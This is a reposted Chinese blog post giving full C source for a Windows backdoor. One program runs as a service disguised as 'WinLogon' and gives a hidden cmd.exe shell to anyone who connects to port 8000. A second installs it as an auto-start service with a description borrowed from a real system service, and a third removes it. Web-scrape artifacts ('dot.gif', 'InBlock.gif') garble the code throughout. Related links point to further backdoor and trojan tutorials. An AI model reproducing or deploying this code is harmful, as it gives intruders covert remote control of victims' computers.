用服务启动后门的C程序实例(转)

最新推荐文章于 2023-02-01 10:10:13 发布
最新推荐文章于 2023-02-01 10:10:13 发布
阅读量392 收藏 1
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/nniixl/archive/2007/04/28/730470.html
版权
软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队( www.eviloctal.com


1、后门服务的代码:backforservice1.c
Copy code
ExpandedBlockStart.gif ContractedBlock.gif /**/ /* 在本机开到服务端口8000,也可以换成其它的反弹型后门*/
None.gif#include  < winsock2.h >
None.gif#include  < windows.h >
None.gif#include  < stdio.h >
None.gif // 预编译指令,下面是设置连接器link中的project options,连接器选项值请参考MSDN:
ExpandedBlockStart.gifContractedBlock.gif /**/ /*#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:main")//用来屏蔽控制台应用程序的窗口
InBlock.gif#pragma comment(linker,"/IGNORE:4078")
ExpandedBlockEnd.gif#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")*/
None.gif#pragma comment(lib,  " ws2_32.lib " // 链接到WS2_32.LIB库
None.gif #define  MasterPort 8000  // 连接端口
None.gif
None.gif
ExpandedBlockStart.gifContractedBlock.gif /**/
None.gif //  Declare several global variables to share 
None.gif //  their values across multiple functions of your program.
ExpandedBlockStart.gifContractedBlock.gif /**/
None.gif SERVICE_STATUS          ServiceStatus; 
None.gifSERVICE_STATUS_HANDLE  hStatus; 
None.gif
ExpandedBlockStart.gifContractedBlock.gif /**/
None.gif //  Make the forward definitions of functions prototypes.
None.gif //
ExpandedBlockStart.gifContractedBlock.gif /**/
None.gif void   ServiceMain( int  argc,  char **  argv); 
None.gif void   ControlHandler(DWORD request);
None.gif void  Entrypoint();
None.gif
None.gif
None.gif //  Control Handler
None.gif void  ControlHandler(DWORD request) 
ExpandedBlockStart.gifContractedBlock.gif dot.gif
InBlock.gif  switch(request) 
ExpandedSubBlockStart.gifContractedSubBlock.gif  dot.gif
InBlock.gif      case SERVICE_CONTROL_STOP: 
InBlock.gif        OutputDebugString("Monitoring stopped.");
InBlock.gif          //printf("Monitoring stopped.\n");
InBlock.gif
InBlock.gif        ServiceStatus.dwWin32ExitCode = 0
InBlock.gif        ServiceStatus.dwCurrentState = SERVICE_STOPPED; 
InBlock.gif        SetServiceStatus (hStatus, &ServiceStatus);
InBlock.gif        return
InBlock.gif
InBlock.gif      case SERVICE_CONTROL_SHUTDOWN: 
InBlock.gif        OutputDebugString("Monitoring stopped.");
InBlock.gif        //printf("Monitoring stopped.\n");
InBlock.gif
InBlock.gif        ServiceStatus.dwWin32ExitCode = 0
InBlock.gif        ServiceStatus.dwCurrentState = SERVICE_STOPPED; 
InBlock.gif        SetServiceStatus (hStatus, &ServiceStatus);
InBlock.gif        return
InBlock.gif        
InBlock.gif      default:
InBlock.gif        break;
ExpandedSubBlockEnd.gif    } 
InBlock.gif
InBlock.gif    // Report current status
InBlock.gif    SetServiceStatus (hStatus, &ServiceStatus);
InBlock.gif
InBlock.gif    return
ExpandedBlockEnd.gif}
None.gif
None.gif void  ServiceMain( int  argc,  char **  argv) 
ExpandedBlockStart.gifContractedBlock.gif dot.gif
InBlock.gif  ServiceStatus.dwServiceType =  SERVICE_WIN32; 
InBlock.gif  ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 
InBlock.gif  ServiceStatus.dwControlsAccepted  = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
InBlock.gif  ServiceStatus.dwWin32ExitCode = 0
InBlock.gif  ServiceStatus.dwServiceSpecificExitCode = 0
InBlock.gif  ServiceStatus.dwCheckPoint = 0
InBlock.gif  ServiceStatus.dwWaitHint = 0
InBlock.gif
InBlock.gif  hStatus = RegisterServiceCtrlHandler(
InBlock.gif      "WinLogon"
InBlock.gif      (LPHANDLER_FUNCTION)ControlHandler); 
InBlock.gif  if (hStatus == (SERVICE_STATUS_HANDLE)0
ExpandedSubBlockStart.gifContractedSubBlock.gif  dot.gif
InBlock.gif      // Registering Control Handler failed
InBlock.gif      return
ExpandedSubBlockEnd.gif  }  
InBlock.gif
InBlock.gif    
InBlock.gif  // We report the running status to SCM. 
InBlock.gif  ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
InBlock.gif  SetServiceStatus (hStatus, &ServiceStatus);
InBlock.gif
InBlock.gif  Entrypoint();
InBlock.gif  return
ExpandedBlockEnd.gif}
None.gif
None.gif void  Entrypoint()
ExpandedBlockStart.gifContractedBlock.gif dot.gif {
InBlock.gifWSADATA WSADa;
InBlock.gifSOCKADDR_IN SockAddrIn;
InBlock.gifSOCKET CSocket,SSocket;
InBlock.gifint iAddrSize;
InBlock.gif
InBlock.gifPROCESS_INFORMATION ProcessInfo; //进程结构信息,136页
InBlock.gifSTARTUPINFO StartupInfo; //核心编程第四章20页,高级编程63页
InBlock.gif
InBlock.gifchar szCMDPath[255];
InBlock.gif
InBlock.gif//-------------------结构清0
InBlock.gifZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
InBlock.gifZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
InBlock.gifZeroMemory(&WSADa, sizeof(WSADATA));
InBlock.gif//----初始化数据----
InBlock.gif//获取cmd路径:
InBlock.gifGetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));//143页
InBlock.gif//加载ws2_32.dll,初使化winsock版本2.2:
InBlock.gifWSAStartup(0x0202,&WSADa);//即WSAStartup(MAKEWORD(2,2),&wsaData);
InBlock.gif
InBlock.gif//设置本地信息和绑定协议:
InBlock.gifSockAddrIn.sin_family = AF_INET; //表示IPv4地址族
InBlock.gifSockAddrIn.sin_addr.s_addr = INADDR_ANY; //表示任意地址
InBlock.gifSockAddrIn.sin_port = htons(MasterPort); //端口号
InBlock.gifCSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 00); //创建一个套接字
InBlock.gif
InBlock.gif//绑定端口:
InBlock.gifbind(CSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
InBlock.giflisten(CSocket,1);
InBlock.gifiAddrSize = sizeof(SockAddrIn);
InBlock.gifSSocket = accept(CSocket,(SOCKADDR *)&SockAddrIn,&iAddrSize);//返回一个已连接套接字SSocket
InBlock.gif//开始连接远程服务器:
InBlock.gifStartupInfo.cb = sizeof(STARTUPINFO);
InBlock.gifStartupInfo.wShowWindow = SW_HIDE;//表示隐藏窗口
InBlock.gifStartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
InBlock.gif//控制台输入与输出句柄指向已连接套接字SSocket:
InBlock.gifStartupInfo.hStdInput = (HANDLE)SSocket;
InBlock.gifStartupInfo.hStdOutput = (HANDLE)SSocket;
InBlock.gifStartupInfo.hStdError = (HANDLE)SSocket;
InBlock.gif//创建匿名管道:
InBlock.gifCreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
InBlock.gifWaitForSingleObject(ProcessInfo.hProcess, INFINITE);//142页,函数准备等待到hProcess句柄标识的进程终止运行为止
InBlock.gifCloseHandle(ProcessInfo.hProcess);//关闭进程和线程句柄
InBlock.gifCloseHandle(ProcessInfo.hThread);
InBlock.gif
InBlock.gifclosesocket(CSocket);//关闭这些套接字
InBlock.gifclosesocket(SSocket);
InBlock.gifWSACleanup();//让Winsock释放所有分配的资源,并取消此应用程序挂起的Winsock调用
InBlock.gif//关闭连接卸载ws2_32.dll
InBlock.gifreturn;
ExpandedBlockEnd.gif}
None.gif
None.gif void  main( int  argc,  char *  argv[])
ExpandedBlockStart.gifContractedBlock.gif dot.gif
InBlock.gif  SERVICE_TABLE_ENTRY ServiceTable[2];
InBlock.gif  ServiceTable[0].lpServiceName = "WinLogon";
InBlock.gif  ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
InBlock.gif
InBlock.gif  ServiceTable[1].lpServiceName = NULL;
InBlock.gif  ServiceTable[1].lpServiceProc = NULL;
InBlock.gif  // Start the control dispatcher thread for our service
InBlock.gif  StartServiceCtrlDispatcher(ServiceTable);
ExpandedBlockEnd.gif}
None.gif



2、下面是创建服务的代码:services2.c
Copy code
None.gif #include  < windows.h >
None.gif#include  < stdio.h >
None.gif
ExpandedBlockStart.gifContractedBlock.gif int  main( void ) dot.gif {
InBlock.gif    char* buff;
InBlock.gif    SC_HANDLE  hSCManager,hService;
InBlock.gif    DWORD hEorr;
InBlock.gif    LPVOID Info;
InBlock.gif
InBlock.gif    Info="为用户和服务身份验证维护此计算机和域控制器之间的安全通道。";
InBlock.gif    //buff="c:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\MemoryStatus\\Debug\\MemoryStatus.exe";
InBlock.gif    buff="C:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\Debug\\backforservice1.exe";
InBlock.gif//第一步是打开SCM,获取句柄然后允许创建服务:
InBlock.gif    hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);
InBlock.gif    if (hSCManager == NULL)
ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{
InBlock.gif        hEorr =GetLastError(); 
InBlock.gif        printf("Open SCManager falsedot.gif..\n",hEorr);
InBlock.gif        exit(0);
ExpandedSubBlockEnd.gif    }
InBlock.gif//第二步是创建服务:
InBlock.gif    hService = CreateService(hSCManager,"WinLogon","WinLogon",SERVICE_ALL_ACCESS, SERVICE_WIN32_SHARE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,buff, NULL, NULL, NULL, NULL, NULL);//SERVICE_START+DELETE
InBlock.gif    if (hService!=NULL) 
ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{    printf("Create service success!\n");
InBlock.gif          ChangeServiceConfig2(hService,SERVICE_CONFIG_DESCRIPTION,&Info);
InBlock.gif          //第三步是启动服务:    
InBlock.gif            StartService(hService,0,NULL);
InBlock.gif            
ExpandedSubBlockEnd.gif        }
InBlock.gif    else 
ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{printf("Create service error!\n");
ExpandedSubBlockEnd.gif    }
InBlock.gif    CloseServiceHandle(hSCManager);//关闭服务句柄
InBlock.gif    CloseServiceHandle(hService);
InBlock.gifreturn 0;
ExpandedBlockEnd.gif}
None.gif


3、下面是删除服务的代码:deleteservice.c
Copy code
None.gif #include  < windows.h >
None.gif#include  < stdio.h >
None.gif
ExpandedBlockStart.gifContractedBlock.gif int  main( void ) dot.gif {
InBlock.gif    SC_HANDLE  hSCManager,hService;
InBlock.gif    DWORD hEorr;
InBlock.gif        
InBlock.gif
InBlock.gif//第一步是打开SCM,获取句柄然后允许打开服务:
InBlock.gif    hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);
InBlock.gif    if (hSCManager == NULL)
ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{
InBlock.gif        hEorr =GetLastError(); 
InBlock.gif        printf("Open SCManager falsedot.gif..\n",hEorr);
InBlock.gif        exit(0);
ExpandedSubBlockEnd.gif    }
InBlock.gif//第二步是打开服务:
InBlock.gif    hService = OpenService(hSCManager,"WinLogon",SERVICE_ALL_ACCESS);
InBlock.gif    if (hService!=NULL) 
ExpandedSubBlockStart.gifContractedSubBlock.gif        dot.gif{
InBlock.gif          //第三步是删除指定服务:    
InBlock.gif          if(DeleteService(hService))
InBlock.gif              printf("Delete service success!\n");
ExpandedSubBlockEnd.gif                  }
InBlock.gif    else 
ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{printf("Delete service error!\n");
ExpandedSubBlockEnd.gif    }
InBlock.gif    CloseServiceHandle(hSCManager);//关闭服务句柄
InBlock.gif        CloseServiceHandle(hService);
InBlock.gif  return 0;
ExpandedBlockEnd.gif}
None.gif

转载于:https://www.cnblogs.com/nniixl/archive/2007/04/28/730470.html

weixin_33716557
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LINK链接选项
nanjingligong的专栏
12-19 1361
用法: LINK [options] [files] [@commandfile]    选项:       /ALIGN:#       /ALLOWBIND[:NO]       /ALLOWISOLATION[:NO]       /ASSEMBLYDEBUG[:DISABLE]       /ASSEMBLYLINKRESOURCE:filename       /ASSEM
C后门编写课件
05-25
1. **C语言基础**:理解C语言的基本语法、数据类型、控制结构以及函数等,是编写任何C程序的基础,包括后门程序。 2. **系统调用**:C语言可以直接调用操作系统提供的接口,如系统调用,用于执行如打开文件、创建...
用C语言编写后台运行程序
2301_76185244的博客
02-01 1627
后台运行程序包括三个子程序,一个父程序,一个守护初级函数,一个初始化函数,一个报告函数和一个睡眠函数。后台运行,它们缺一不可。 首先是父程序,它是整个后台运行程序最复杂的部分,也是其中的根基,它的代码如下: void init_daemon(void) { int pid; int i; if(pid=fork()) { exit(0); }else if(pid< 0) { exit(1); 通过其来判断后台是否运行。 然后是第一子程序,代码如下: if(pid=fork())
木马与后门技术
m0_65487180的博客
12-28 2284
计算机木马 一个包含在合法程序中的非法程序 木马植入路径 邮件,下载(木马捆绑) 利用脚本,系统漏洞 木马的危害 文件操作 删除,修改文件 修改注册表 窃取密码 系统操作 木马的特点 自启动功能 隐蔽性 常见的木马种类 远程控制木马 冰河木马 键盘屏幕记录密码 QQ密码记录器 反弹端口型木马 广外女声,网络神偷 DDOS攻击木马 后门程序介绍 后门是木马的一种,非常规登录。带有backdoor字样 后门程序分类 网页后门...
c语言后门,C语言做的后门【反连】
weixin_35917998的博客
05-19 247
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/*Protocol of connectionConnect : CONNConnected Success : SUCCReboot : REBT 暂时不可用Upload : UPLDDownload : DNLDDestroy : DTOY 暂时不可用Help : HELP 暂时不可用OK : START TO TRANSFER ...
一个ASP.Net下的WebShell实例
10-27
- `UseShellExecute = false` 禁止使用外壳程序启动,避免不必要的安全风险。 - `RedirectStandardInput = true` 重定向标准输入,允许我们向命令行发送命令。 - `RedirectStandardOutput = true` 重定向标准输出...
vc++ 应用源码包_5
09-15
内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、文件与文件夹属性操作、文件与文件夹系统操作、系统控制操作、程序...
vc++ 应用源码包_1
09-15
内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、文件与文件夹属性操作、文件与文件夹系统操作、系统控制操作、程序...
C语言,后门程序,c语言windows后门
weixin_31741271的博客
05-18 274
c语言windows后门在WINDOWS服务器渗透的时候可能用的着,也可以让xx界里的朋友学点东西功能在帐户有组策略限制的时候,无法添加管理员账号的时候,可以不用密码登陆。测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。// get.cpp : 定义控制台应用程序的入口点。//#include "stdio.h"#include #include BOOL E...
C#实现后门程序实例
02-23
一个简单的C#后门程序实例,告诉你怎样去写一个后门程序
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
基于C/C++socket通信的后台木马程序
热门推荐
单核CPU的小朋友的博客
09-09 5万+
基于C/C++socket通信的后台木马程序 什么是socket通信? 网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。 建立网络通信连接至少要一对端口号(socket)。socket本质是编程接口(API),对TCP/IP的封装,TCP/IP也要提供可供程序员做网络开发所用的接口,这就是Socket编程接口;HTTP是轿车,提供了封装或...
socket编程例子:TCP Shell后门
01-20 1711
  来源:本文出自:http://sinbad.zhoubin.com 作者: 不详 (2002-12-12 06:02:00)很简单很容易被发现,且当作socket编程例子学习吧。 /**//*=============================================================================    TCP Shell Ver
一个后门程序开发实例--基础VC版
califan的专栏
02-25 2217
<br /><br />作者:f286<br />下载本文示例源代码<br /><br />注:这个程序有一定的破坏性,不要用于非法的目的!<br />代码运行效果图如下:<br /><br /><br />小弟最近看了VC知识库在线杂志第十二期中,有一篇《黑客攻击手段之偷梁换柱》突发灵感也想写一个黑客程序。经过了几天的搜集资料和试验终于写出了一个可以自动关闭IE和windows中自带游戏的小程序和大家分享,希望大家多提意见!<br /><br />我在程序中采用了两种方法:<br /><br />一种是
C语言,后门程序,用C语言写的后门beta2.0    |    IPC$入侵傻瓜式工具
weixin_35457696的博客
05-18 328
// 后门.cpp : Defines the entry point for the consoleapplication.//#include "stdafx.h"#include "stdlib.h"int main(int argc, char* argv[]){system("reg add\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\...
安全之路 —— C/C++实现后门服务启动
雨者
05-04 2223
简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务启动等方法,其中服务启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。 C++代码样例 ////////////////////////////////////////////////////////////// // // F...
C语言,后门程序,C语言CGI编程二 - 编写cmd后门
weixin_39726044的博客
05-18 500
里面该说的都说的很清楚。今天我们来用它来做一个后门,将后门放在有执行cgi权限的服务器上,通过客户端POST命令到cgi上并执行,达到控制服务器的目的。首先下载官网上的压缩包。解压里面有cgic.c和cgic.h,这是我们需要用到的文件。(另外两个c文件是演示用的,还有一个makefile是linux下使用的,在VS2010中我没有用到它)从官方的文档和下载的cgictest.c可以看到,这个库里...
毕业设计-c--基于反弹socket通信的windows系统后门实现.doc
最新发布
06-30
- **HVNcon.exe**:这是后门的主控制程序,包含了系统操作的核心代码,如服务安装、注册表操作、启动项写入、下载功能、反弹cmdshell以及密码保护。 - **HVNADD.exe**:在系统启动后设定的时间延迟添加指定用户到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值